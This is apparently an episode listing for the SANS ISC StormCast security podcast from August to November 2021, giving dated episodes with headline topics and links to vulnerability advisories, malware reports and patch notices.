Targeted Attack Campaign Against ManageEngine ADSelfService Plus https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/
Image-Scaling Attacks in Machine Learning https://www.usenix.org/system/files/sec20fall_quiring_prepub.pdf
11/9/2021 - 7 minutes, 15 seconds

ISC StormCast for Monday, November 8th, 2021

Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+Keys+Extracted+From+Process+Memory/28006/
XMount for Disk Images https://isc.sans.edu/forums/diary/Xmount+for+Disk+Images/28002/
More Proactive SIMs https://medium.com/telecom-expert/more-proactive-sims-f8da2ef8b189
Thunderbird Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-50/
11/8/2021 - 5 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, November 5th, 2021

October 2021 Forensic Contest Answers and Analysis https://isc.sans.edu/forums/diary/October+2021+Forensic+Contest+Answers+and+Analysis/27998/ CVE-2021-43267: Remote Linux Kernel Heap Overflow in TIPC Module https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x The Security Risk of Lacking Compiler Protection in WebAssembly https://arxiv.org/abs/2111.01421
11/5/2021 (7 minutes, 3 seconds)

ISC StormCast for Thursday, November 4th, 2021

Gitlab CVE-2021-22205 Exploited (and often not patched) https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/ New Proxy Shell Exploits Seen Against Exchange https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html Blackmatter Shutting Down Again https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ Android 0-Day Patched https://source.android.com/security/bulletin/2021-11-01
11/4/2021 (5 minutes, 11 seconds)

ISC StormCast for Wednesday, November 3rd, 2021

Revisiting BrakTooth: Two Months Later https://isc.sans.edu/forums/diary/Revisiting+BrakTooth+Two+Months+Later/27992/ Escalating XSS to Sainthood with Nagios https://blog.grimm-co.com/2021/11/escalating-xss-to-sainthood-with-nagios.html Pentaho Business Analytics Vulnerability https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
11/3/2021 (5 minutes, 41 seconds)

ISC StormCast for Tuesday, November 2nd, 2021

Trojan Source: Invisible Vulnerabilities https://www.trojansource.codes/trojan-source.pdf Detecting HTTP Header Smuggling Vulnerabilities https://www.darkreading.com/application-security/free-tool-scans-web-servers-for-vulnerability-to-http-header-smuggling-attacks Kaspersky Lost Amazon Simple Email Service Token https://support.kaspersky.com/general/vulnerability.aspx?el=12430#01112021_phishing
11/2/2021 (7 minutes, 3 seconds)

ISC StormCast for Monday, November 1st, 2021

Remote Desktop Protocol RDP Discovery https://isc.sans.edu/forums/diary/Remote+Desktop+Protocol+RDP+Discovery/27984/ Sysmon Update https://isc.sans.edu/forums/diary/Sysinternals+Autoruns+and+Sysmon+updates/27986/ Google Chrome Updates https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html AbstractEmu Malware Roots Android https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign Microsoft Defender For Endpoint Web Content Filtering https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/web-content-filtering-now-generally-available-on-windows/ba-p/2893357
11/1/2021 (5 minutes, 22 seconds)

ISC StormCast for Friday, October 29th, 2021

Critical Hikvision Patch https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ Shrootless Vulnerability in MacOS https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/ More Malicious NPM Libraries https://www.theregister.com/2021/10/27/npm_roblox_ransomware/
10/29/2021 (5 minutes, 36 seconds)

ISC StormCast for Thursday, October 28th, 2021

Outlook Web Access Phishing https://isc.sans.edu/forums/diary/Hunting+for+Phishing+Sites+Masquerading+as+Outlook+Web+Access/27974/ Apple Security Updates Details Available https://support.apple.com/en-us/HT201222 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PinkBot Botnet Uses DoH https://blog.netlab.360.com/pinkbot/ Jira Insight Patch https://confluence.atlassian.com/adminjiraserver/jira-service-management-security-advisory-2021-10-20-1085186548.html
10/28/2021 (5 minutes, 9 seconds)

ISC StormCast for Wednesday, October 27th, 2021

Apple Updates Everything (but no details yet) https://support.apple.com/en-sa/HT201222 Craigslist E-Mail Hijack https://www.inky.com/blog/urgency-mail-relay-serve-phishers-well-on-craigslist UltimaSMS Android Malware https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast Firefox Proxy Malware https://blog.mozilla.org/security/2021/10/25/securing-the-proxy-api-for-firefox-add-ons/
10/27/2021 (5 minutes, 35 seconds)

ISC StormCast for Tuesday, October 26th, 2021

Decrypting Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+a+Leaked+Private+Key/27968/ Critical Discourse Vulnerability https://us-cert.cisa.gov/ncas/current-activity/2021/10/24/critical-rce-vulnerability-discourse Discourse Discussion Platform RCE https://github.com/discourse/discourse/security/advisories/GHSA-jcjx-pvpc-qgwq https://0day.click/recipe/discourse-sns-rce/ ua-parser-js malware https://github.com/advisories/GHSA-pjwm-rvh2-c87w Vulnerable Billing Software BillQuick Web Used to Deploy Ransomware https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
10/26/2021 (4 minutes, 44 seconds)

ISC StormCast for Monday, October 25th, 2021

Malware Quiz https://isc.sans.edu/forums/diary/October+2021+Contest+Forensic+Challenge/27960/ Odd Zip Files https://isc.sans.edu/forums/diary/Phishing+ZIP+With+Malformed+Filename/27966/ Decrypting Cobalt Strike Configurations Using Known Secret Keys https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ Tracking BLE Fingerprints https://cseweb.ucsd.edu/~nibhaska/papers/sp22_paper.pdf GPS Software Bug https://us-cert.cisa.gov/ncas/current-activity/2021/10/21/gps-daemon-gpsd-rollover-bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/
10/25/2021 (5 minutes, 35 seconds)

ISC StormCast for Friday, October 22nd, 2021

Stolen Images Evidence Campaign Pushes Sliver Based Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+campaign+pushes+Sliverbased+malware/27954/ FiveSys Rootkit Signed By Microsoft https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2021.html WinRAR Vulnerability https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/ Crypto Mining npm Libraries https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices
10/22/2021 (6 minutes, 18 seconds)

ISC StormCast for Thursday, October 21st, 2021

Thanks to Covid 19: New Types of Documents are Lost in the Wild https://isc.sans.edu/forums/diary/Thanks+to+COVID19+New+Types+of+Documents+are+Lost+in+The+Wild/27952/ Google Chrome 95 Released https://chromestatus.com/roadmap Squirrel VM Bug https://thehackernews.com/2021/10/squirrel-engine-bug-could-let-attackers.html BlackByte Decryptor Released https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ https://github.com/SpiderLabs/BlackByteDecryptor
10/21/2021 (5 minutes, 38 seconds)

ISC StormCast for Wednesday, October 20th, 2021

Can You Make the Great Chinese Firewall Work For You https://isc.sans.edu/forums/diary/Can+you+make+the+Great+Chinese+Firewall+work+for+you/27948/ Fake Government Assistance Websites https://www.ic3.gov/Media/Y2021/PSA211015 TA505 Coming Back https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant BlackMatter Ransomware https://us-cert.cisa.gov/ncas/alerts/aa21-291a
10/20/2021 (4 minutes, 45 seconds)

ISC StormCast for Tuesday, October 19th, 2021

Malicious PowerShell Script Using Client Certificate Authentication https://isc.sans.edu/forums/diary/Malicious+PowerShell+Using+Client+Certificate+Authentication/27944/ PowerShell Updates https://github.com/PowerShell/Announcements/issues/27 Juniper JunOS Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES TianFu Cup https://tianfucup.com/en/#canjia
10/19/2021 (5 minutes, 6 seconds)

ISC StormCast for Monday, October 18th, 2021

Active Scanning for Apache Vulnerabilities CVE-2021-41773 and 42013 https://isc.sans.edu/forums/diary/Apache+is+Actively+Scan+for+CVE202141773+CVE202142013/27940/ Warranty Repairs and Non Removable Storage Risks https://isc.sans.edu/forums/diary/Warranty+Repairs+and+NonRemovable+Storage+Risks/27938/ Crypto Wallet Compromised on OpenSea NFT Marketplace https://blog.checkpoint.com/2021/10/13/check-point-software-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/ $5.2 Billion worth of Bitcoin Transactions Linked to Ransomware https://www.fincen.gov/sites/default/files/shared/Financial%20Trend%20Analysis_Ransomeware%20508%20FINAL.pdf
10/18/2021 (5 minutes, 34 seconds)

ISC StormCast for Friday, October 15th, 2021

Port Forwarding with Windows for the Win https://isc.sans.edu/forums/diary/PortForwarding+with+Windows+for+the+Win/27934/ Please Fix Your E-Mail Brute Forcing Tool https://isc.sans.edu/forums/diary/Please+fix+your+EMail+Brute+forcing+tool/27930/ Ad Blocker Injects Ads https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/ Romance Scams Go After Crypto Currency https://nakedsecurity.sophos.com/2021/10/13/romance-scams-with-a-cryptocurrency-twist-new-research-from-sophoslabs/ Sysmon For Linux https://github.com/Sysinternals/SysmonForLinux Foxit Updates https://www.foxit.com/support/security-bulletins.html VMWare Updates https://www.vmware.com/security/advisories/VMSA-2021-0023.html
10/15/2021 (6 minutes, 32 seconds)

ISC StormCast for Wednesday, October 13th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2021+Patch+Tuesday/27928/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PyPI Removes mitmproxy2 Module https://twitter.com/maximilianhils/status/1447525552370458625 https://web.archive.org/web/20211012105244/https://gist.github.com/mhils/7ff29d50b25a1c99e06834cf95684333
10/13/2021 (5 minutes, 54 seconds)

ISC StormCast for Tuesday, October 12th, 2021

Non HTTP Requests Hitting Web Server https://isc.sans.edu/forums/diary/Things+that+go+Bump+in+the+Night+Non+HTTP+Requests+Hitting+Web+Servers/27924/ Apple Updates iOS/iPadOS to 15.0.2 https://saaramar.github.io/IOMFB_integer_overflow_poc/ https://support.apple.com/en-us/HT212846 Weak SSH Keys Used with GitKraken https://github.blog/2021-10-11-github-security-update-revoking-weakly-generated-ssh-keys/ Let's Encrypt Outage https://letsencrypt.status.io/pages/incident/55957a99e800baa4470002da/6164b5af714e1f053880ba0c
10/12/2021 (5 minutes, 4 seconds)

ISC StormCast for Monday, October 11th, 2021

Scanning for Previous Oracle WebLogic Vulnerabilities https://isc.sans.edu/forums/diary/Scanning+for+Previous+Oracle+WebLogic+Vulnerabilities/27918/ Sorting Things Out - Sorting Data by IP Address https://isc.sans.edu/forums/diary/Sorting+Things+Out+Sorting+Data+by+IP+Address/27916/ https://gitlab.com/slackermedia/bashcrawl Telegram Does Not Remove Auto-Deleted Messages from Cache https://habr.com/en/post/580582/ Microsoft To Disable Excel 4.0 Macros By Default https://twitter.com/GelosSnake/status/1446192775087722497 https://m365admin.handsontek.net/macro-settings-update-to-disable-excel-4-0-macros-by-default/
10/11/2021 (5 minutes, 24 seconds)

ISC StormCast for Friday, October 8th, 2021

Who is Hunting For Your IPTV Set-Top Box? https://isc.sans.edu/forums/diary/Who+Is+Hunting+For+Your+IPTV+SetTop+Box/27912/ Another Update For Apache https://httpd.apache.org Font on Lake Rootkit https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/ osquery 5 with macOS Endpoint Security https://www.trailofbits.com/post/announcing-osquery-5-now-with-endpointsecurity-on-macos
10/8/2021 (6 minutes, 21 seconds)

ISC StormCast for Thursday, October 7th, 2021

Apache 2.4.49 Directory Traversal Vulnerability https://isc.sans.edu/forums/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908/ Python Ransomware Targeting ESXi Server https://www.sophos.com/en-us/press-office/press-releases/2021/10/sophos-researchers-uncover-new-python-ransomware-targeting-an-esxi-server-and-virtual-machines.aspx AT&T SIM Forensics https://medium.com/telecom-expert/what-is-at-t-doing-at-1111340002-c418876c212c Google Making Additional 2FA Push https://blog.google/technology/safety-security/making-sign-safer-and-more-convenient/
10/7/2021 (5 minutes, 19 seconds)

ISC StormCast for Wednesday, October 6th, 2021

Looking Glass Sites https://isc.sans.edu/forums/diary/Looking+Glasses+Debugging+Network+Connectivity+Issues/27904/ Facebook Postmortem https://engineering.fb.com/2021/10/05/networking-traffic/outage-details/ Apache 2.4.49 Directory Traversal Vulnerability https://blog.sonatype.com/apache-servers-actively-exploited-in-wild-importance-of-prompt-patching Windows 11 Released https://www.microsoft.com/security/blog/2021/10/04/windows-11-offers-chip-to-cloud-protection-to-meet-the-new-security-challenges-of-hybrid-work/ https://www.microsoft.com/en-us/download/details.aspx?id=55319
10/6/2021 (5 minutes, 40 seconds)

ISC StormCast for Tuesday, October 5th, 2021

Facebook Outage https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ Boutique "Dark" Botnet Hunting for Crumbs https://isc.sans.edu/forums/diary/Boutique+Dark+Botnet+Hunting+for+Crumbs/27898/ Apache Airflow May Leak Credentials https://www.intezer.com/blog/cloud-security/misconfigured-airflows-leak-credentials/
10/5/2021 (5 minutes, 47 seconds)

ISC StormCast for Monday, October 4th, 2021

A New Tool To Add to Your LOLBAS List: cvtres.exe https://isc.sans.edu/forums/diary/New+Tool+to+Add+to+Your+LOLBAS+List+cvtresexe/27892/ Google Chrome Continuing Updates https://support.google.com/chrome/answer/95414?hl=en&co=GENIE.Platform%3DDesktop Cyber Security Awareness Month https://www.sans.org/security-awareness-training/resources/ https://isc.sans.edu/tag.html?tag=csam FCC Attempts to Fight SIM Swapping https://docs.fcc.gov/public/attachments/DOC-376199A1.pdf MacOS Gatekeeper Bypass https://labs.f-secure.com/blog/the-discovery-of-cve-2021-1810/
10/4/2021 (5 minutes, 51 seconds)

ISC StormCast for Friday, October 1st, 2021

Visa/Apple Express Transit Relay Attack https://www.bbc.com/news/technology-58719891 FluBot Offering Fake FluBot Protection https://twitter.com/CERTNZ/status/1443701853665980440 Undetected Azure Active Directory Brute-Force Attacks https://www.secureworks.com/research/undetected-azure-active-directory-brute-force-attacks SANS.edu Student Christopher DeWees: Expired Domain Dumpster Diving https://www.sans.edu/cyber-research/40505/
10/1/2021 (14 minutes, 59 seconds)

ISC StormCast for Thursday, September 30th, 2021

Keeping Track of Time: Network Time Protocol and GPSD Bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/ Apple Airtags Stored XSS https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-credentials-with-apple-airtags-stored-xss-6997da43a216 CISA/NSA Guidance To Configure VPNs https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF Facebook Open Sourcing "Mariana Trench" Tool To Analyze Android and Java Apps https://engineering.fb.com/2021/09/29/security/mariana-trench/
9/30/2021 (5 minutes, 28 seconds)

ISC StormCast for Wednesday, September 29th, 2021

TLS 1.3 and SSL: The Current State of Affairs https://isc.sans.edu/forums/diary/TLS+13+and+SSL+the+current+state+of+affairs/27882/ EFF Discontinues HTTPS Everywhere Plugin https://www.eff.org/deeplinks/2021/09/https-actually-everywhere Malicious CryptoCoin Wallet https://discourse.mozilla.org/t/got-hacked-by-the-add-on-called-safepal-wallet/85797 Microsoft Automates Exchange Mitigations https://techcommunity.microsoft.com/t5/exchange-team-blog/new-security-feature-in-september-2021-cumulative-update-for/ba-p/2783155
9/29/2021, 5 minutes, 39 seconds
ISC StormCast for Tuesday, September 28th, 2021

Trend Micro ServerProtect Authentication Bypass Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-21-1115/ Let's Encrypt Root CA Expiration https://community.letsencrypt.org/t/production-chain-changes/150739 ERMAC Android Malware https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html QNAP Vulnerabilities https://www.qnap.com/en/security-advisory/QSA-21-35
9/28/2021, 5 minutes, 47 seconds
ISC StormCast for Monday, September 27th, 2021

Mobile Device Inventory via Active Sync https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+Users+Mobile+Devices+Simple+Inventory/27868/ Autodiscover Attacks https://autodiscover-vulnerable-tlds.com https://wiki.mozilla.org/Public_Suffix_List https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Three More 0-Day Vulnerabilities in iOS https://habr.com/en/post/579714/ original Russian version: https://habr.com/en/post/579716/ Cisco CAPWAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-capwap-rce-LYgj8Kf Sonicwall SMA 100 Series Vulnerability https://www.sonicwall.com/support/product-notification/security-notice-critical-arbitrary-file-delete-vulnerability-in-sonicwall-sma-100-series-appliances/210819124854603/
9/27/2021, 6 minutes, 13 seconds
ISC StormCast for Friday, September 24th, 2021

Excel Recipe: Some VBA Code with a Touch of Excel4 Macro https://isc.sans.edu/forums/diary/Excel+Recipe+Some+VBA+Code+with+a+Touch+of+Excel4+Macro/27864/ Windows Platform Binary Table Weakness https://eclypsium.com/2021/09/20/everyone-gets-a-rootkit/ Apple Patches Older iOS/MacOS Versions https://support.apple.com/en-us/HT201222 Broken Digital Signatures Used to Foil Malware Detection https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/
9/24/2021, 5 minutes, 31 seconds
ISC StormCast for Thursday, September 23rd, 2021

An XML-Obfuscated Office Document (CVE-2021-40444) https://isc.sans.edu/forums/diary/An+XMLObfuscated+Office+Document+CVE202140444/27860/ Exchange Autodiscover Leaks Credentials https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Nagios Vulnerabilities https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/ Apple Deprecating TLS 1.0/1.1 https://developer.apple.com/news/?id=bv8ur34d
9/23/2021, 6 minutes, 53 seconds
ISC StormCast for Wednesday, September 22nd, 2021

A First Look at Apple's iOS 15 "Private Relay" feature https://isc.sans.edu/forums/diary/A+First+Look+at+Apples+iOS+15+Private+Relay+feature/27858/ macOS Finder Security Feature Bypass Leads to Possible RCE https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/ VMware vCenter Advisory https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html NetGear Circle Parental Control Vulnerability https://blog.grimm-co.com/2021/09/mama-always-told-me-not-to-trust.html
9/22/2021, 5 minutes, 40 seconds
ISC StormCast for Tuesday, September 21st, 2021

OMIGOD Exploits Captured in the Wild. https://isc.sans.edu/forums/diary/OMIGOD+Exploits+Captured+in+the+Wild+Researchers+responsible+for+half+of+scans+for+related+ports/27852/ Apple iOS/iPadOS/tvOS 15 Updates (and WatchOS, Xcode, Safari) https://support.apple.com/en-us/HT201222 ManageEngine ADSelfService Plus Exploited https://us-cert.cisa.gov/ncas/alerts/aa21-259a
9/21/2021, 6 minutes, 24 seconds
ISC StormCast for Monday, September 20th, 2021

Malicious Calendar Subscriptions Are Back https://isc.sans.edu/forums/diary/Malicious+Calendar+Subscriptions+Are+Back/27846/ Simple Analysis of a CVE-2021-40444 (MSHTML) Document https://isc.sans.edu/forums/diary/Simple+Analysis+Of+A+CVE202140444+docx+Document/27848/ Mirai Botnet Hunting OMIGOD https://twitter.com/1ZRR4H/status/1438580885142507528 https://isc.sans.edu/port.html?port=1270 Exploit for Netgear Flaws Available https://gynvael.coldwind.pl/?id=742
9/20/2021, 5 minutes, 47 seconds
ISC StormCast for Friday, September 17th, 2021

Phishing 101: why depend on one suspicious message subject when you can use many https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/ PrintNightmare Fix Breaks Network Printing https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/ Malware Taking Advantage of Linux Subsystem for Windows https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/ Travis CI Patch https://travis-ci.community/t/security-bulletin/12081 IBM System x IMM Vulnerability https://support.lenovo.com/es/en/product_security/len-66347 Fake iTerm installing Malware on OS X https://objective-see.com/blog/blog_0x66.html
9/17/2021, 6 minutes, 30 seconds
ISC StormCast for Thursday, September 16th, 2021

Hancitor Campaign Abusing Microsoft's OneDrive https://isc.sans.edu/forums/diary/Hancitor+campaign+abusing+Microsofts+OneDrive/27838/ "Secret" Agent Exposes Azure Customers To Unauthorized Code Execution https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution
9/16/2021, 5 minutes, 29 seconds
ISC StormCast for Wednesday, September 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
9/15/2021, 5 minutes, 22 seconds
ISC StormCast for Tuesday, September 14th, 2021

Apple Updates Everything https://support.apple.com/en-us/HT201222 Citizenlab Discloses NSO Exploit Details https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/ Google Chrome Update https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html WooCommerce Multi Currency Plugin Vulnerability https://blog.nintechnet.com/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin/
9/14/2021, 5 minutes, 8 seconds
ISC StormCast for Monday, September 13th, 2021

Shipping Microsoft DNS Logs to Elasticsearch https://isc.sans.edu/forums/diary/Shipping+to+Elasticsearch+Microsoft+DNS+Logs/27828/ Exploit Generator for CVE-2021-40444 https://github.com/lockedbyte/CVE-2021-40444 Windows Lock Screen Bypass https://halove23.blogspot.com/2021/09/zdi-21-1053-bypassing-windows-lock.html Citrix Hypervisor Update https://support.citrix.com/article/CTX325319 GitHub Identifies Vulnerable node.js Packages https://github.blog/2021-09-08-github-security-update-vulnerabilities-tar-npmcli-arborist/
9/13/2021, 5 minutes, 33 seconds
ISC StormCast for Friday, September 10th, 2021

ISC/DShield API Updates https://isc.sans.edu/forums/diary/Updates+to+Our+DatafeedsAPI/27824/ Update on Windows MSHTML Vulnerability https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/ GitHub Actions check-spelling community workflow GITHUB_TOKEN leakage https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md
9/10/2021, 6 minutes, 30 seconds
ISC StormCast for Thursday, September 9th, 2021

Protonmail Correction https://protonmail.com/blog/climate-activist-arrest/ https://protonmail.com/privacy-policy "Stolen Images Evidence" Campaign Continues Pushing BazarLoader Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+Campaign+Continues+Pushing+BazarLoader+Malware/27816/ Thycotic Secret Server Critical Update https://docs.thycotic.com/ss/11.0.0/release-notes/ss-rn-11-0-000007.md Zoho Vulnerability Exploited https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html
9/9/2021, 5 minutes, 39 seconds
ISC StormCast for Wednesday, September 8th, 2021

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 ProtonMail/VPN Releasing User's IP Address https://protonmail.com/blog/climate-activist-arrest/ WhatsApp End To End Encryption Questioned (but upheld) https://twitter.com/evacide/status/1435288900587589632?s=20 PRIVATELOG and STASHLOG Malware Store Payload in Common Log File System (CLFS) https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
9/8/2021, 5 minutes, 43 seconds
ISC StormCast for Tuesday, September 7th, 2021

Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://www.jenkins.io/blog/2021/09/04/wiki-attacked/ ProxyShell Update https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ RCE-0-Day for GhostScript 9.50 https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50 Netgear Switch Auth Bypass https://kb.netgear.com/000063978/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Smart-Switches-PSV-2021-0140-PSV-2021-0144-PSV-2021-0145
9/7/2021, 5 minutes, 25 seconds
ISC StormCast for Friday, September 3rd, 2021

Attackers Will Always Abuse Major Events in our Lives https://isc.sans.edu/forums/diary/Attackers+Will+Always+Abuse+Major+Events+in+our+Lifes/27808/ Active Exploitation of Confluence Server CVE-2021-26084 https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ GitHub Removing Old Ciphers / Keys https://github.blog/2021-09-01-improving-git-protocol-security-github/ Cisco Enterprise NFV Infrastructure Software Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-g2DMVVh Hackers are Selling Tool to Hide Malware in GPUs https://www.ehackingnews.com/2021/09/hackers-are-selling-tool-to-hide.html Michael Beck: Cloud Forensics Triage Framework (CFTF) https://www.sans.org/white-papers/40415/
9/3/2021, 14 minutes, 10 seconds
ISC StormCast for Thursday, September 2nd, 2021

STRRAT: A Java Based RAT That Doesn't Care if You Have Java https://isc.sans.edu/forums/diary/STRRAT+a+Javabased+RAT+that+doesnt+care+if+you+have+Java/27798/ IPC360 Baby Monitor Vulnerability https://www.bitdefender.com/files/News/CaseStudies/study/402/Bitdefender-PR-Whitepaper-VictureIPC-creat5590-en-EN.pdf Annke Network Video Recorder Vulnerability https://us-cert.cisa.gov/ics/advisories/icsa-21-238-02 ProxyWare Abuse https://blog.talosintelligence.com/2021/08/proxyware-abuse.html
9/2/2021, 6 minutes
ISC StormCast for Wednesday, September 1st, 2021

BrakTooth: Impacts, Implications and Next Steps https://isc.sans.edu/forums/diary/BrakTooth+Impacts+Implications+and+Next+Steps/27802/ Fortress Home Security System Weakness https://threatpost.com/fortress-home-security-remote-disarmament/169069/ PostgreSQL set_user Module Vulnerability https://www.postgresql.org/about/news/set_user-201-released-2279/
9/1/2021, 5 minutes, 27 seconds
ISC StormCast for Tuesday, August 31st, 2021

Cryptocurrency Clipboard Swapper Delivered With Love https://isc.sans.edu/forums/diary/Cryptocurrency+Clipboard+Swapper+Delivered+With+Love/27794/ ProxyToken Vulnerability in Exchange https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server LockFile Ransomware Evasion Tricks https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html
8/31/2021, 5 minutes, 54 seconds
ISC StormCast for Monday, August 30th, 2021

ChaosDB: Azure Cosmos Database Vulnerability https://chaosdb.wiz.io Phishing via Open Redirects https://www.microsoft.com/security/blog/2021/08/26/widespread-credential-phishing-campaign-abuses-open-redirector-links/ Parallels Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/208188 https://www.zerodayinitiative.com/advisories/ZDI-21-1000/
8/30/2021, 5 minutes, 4 seconds
ISC StormCast for Friday, August 27th, 2021

Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x GETH DoS Vulnerability https://github.com/ethereum/go-ethereum/releases/tag/v1.10.8 Confluence Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html VMWare Updates https://www.vmware.com/security/advisories.html
8/27/2021, 5 minutes, 44 seconds
ISC StormCast for Thursday, August 26th, 2021

There May Be Many More SPF Records Than We Might Expect https://isc.sans.edu/forums/diary/There+may+be+many+more+SPF+records+than+we+might+expect/27786/ OpenSSL Update https://www.openssl.org/news/vulnerabilities.html F5 Update https://support.f5.com/csp/article/K50974556 https://support.f5.com/csp/article/K41351250 SideWalk Backdoor https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
8/26/2021, 5 minutes, 44 seconds
ISC StormCast for Wednesday, August 25th, 2021

Attackers Hunting for Twilio Credentials https://isc.sans.edu/forums/diary/Attackers+Hunting+For+Twilio+Credentials/27782/ Modified WhatsApp Spreading Malware https://securelist.com/triada-trojan-in-whatsapp-mod/103679/ Privilege Escalation without Plugging in a Device http://0xsp.com/security%20research%20&%20development%20(SRD)/local-administrator-is-not-just-with-razer-it-is-possible-for-all
8/25/2021, 5 minutes, 21 seconds
ISC StormCast for Tuesday, August 24th, 2021

Out of Band Phishing Using SMS Messages to Evade Network Detection https://isc.sans.edu/forums/diary/Out+of+Band+Phishing+Using+SMS+messages+to+Evade+Network+Detection/27768/ Elevate Privileges with Razer Mouse https://twitter.com/j0nh4t/status/1429049506021138437 Realtek Vulnerabilities Exploited https://securingsam.com/realtek-vulnerabilities-weaponized/ Exposed Microsoft Power Apps https://www.upguard.com/breaches/power-apps
8/24/2021, 5 minutes, 41 seconds
ISC StormCast for Monday, August 23rd, 2021

